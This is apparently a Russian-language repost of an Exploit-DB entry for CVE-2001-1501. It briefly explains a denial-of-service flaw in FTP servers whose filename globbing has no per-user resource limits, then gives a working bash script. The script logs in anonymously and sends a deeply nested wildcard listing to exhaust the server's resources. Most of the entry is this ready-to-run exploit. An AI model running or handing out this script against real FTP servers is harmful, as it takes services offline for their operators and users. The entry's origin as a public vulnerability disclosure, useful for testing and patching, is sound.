- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20690
- Проверка EDB
-
- Пройдено
- Автор
- FRANK DENIS
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2001-1501
- Дата публикации
- 2001-03-15
Код:
source: https://www.securityfocus.com/bid/2496/info
Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.
Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.
The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented.
#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass [email protected]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20- Источник
- www.exploit-db.com
